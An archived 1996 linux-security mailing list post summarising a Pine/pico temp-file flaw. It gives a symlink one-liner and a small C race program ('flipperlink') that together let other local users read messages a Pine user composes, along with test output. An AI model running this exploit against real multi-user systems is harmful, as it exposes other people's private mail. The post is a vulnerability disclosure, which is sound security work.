|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: message rejected: Re: [linux-security] Pine security problem.
Pascal A. Dupuis (dupuis
lei.ucl.ac.be)Fri, 13 Sep 1996 10:07:19 +0200
- Messages sorted by: [ date ][ thread ][ subject ][ author ]
- Next message: Perry E. Metzger: "Re: SYN Flooding [info]"
- Previous message: Yiorgos Adamopoulos: "Re: BUG in /bin/bash"
Hello,
I got a bunch of messages in reply to Re: Pine Security problem. Here is a
summary:
First of all, the exploit is straightforward with Linux :
ln -s /tmp/hacker.tmp /tmp/pico.pid; touch /tmp/hacker.tmp;
the /tmp/hacker.tmp must be rw-rw-rw- (mode 666), and everybody could
have a look on composed message.
I tried also Rogier Wolff suggestion about the flipperlink program ,
running at high processor load to have swapping (compiling the kernel)
>main (int argc,char **argv)
> {
> while (1) {
> rename (argv[1],argv[2]);
> rename (argv[2],argv[1]);
> }
> }
and run it with :
> cd /tmp
> ln -s hacker.tmp pico.pid
> flipperlink pico.pid bla
Once the alternate editor is invoqued, the hacker.tmp, if not
existing, is created 600, owned by the pine user. At this time, the toggle
stop working as long as the alternate editor is working.
the amasing fact is the ownership :
ls -l /tmp
lrwxrwxrwx 1 hacker grp 10 Sep 13 09:49 bla ->hacker.tmp
-rw------- 1 dupuis grp 3042 Sep 13 09:50 hacker.tmp
hacker> more blah
hacker>blah : permission denied
It is thus the ownership of the destination file which is used.
Greetings
Pascal A. Dupuis
--
Information Science is emerging from the Prehistoric Ages, but its
language still reflects it : gnu, hurd, awk, nroff, ls, ar, chmod, ...
- Next message: Perry E. Metzger: "Re: SYN Flooding [info]"
- Previous message: Yiorgos Adamopoulos: "Re: BUG in /bin/bash"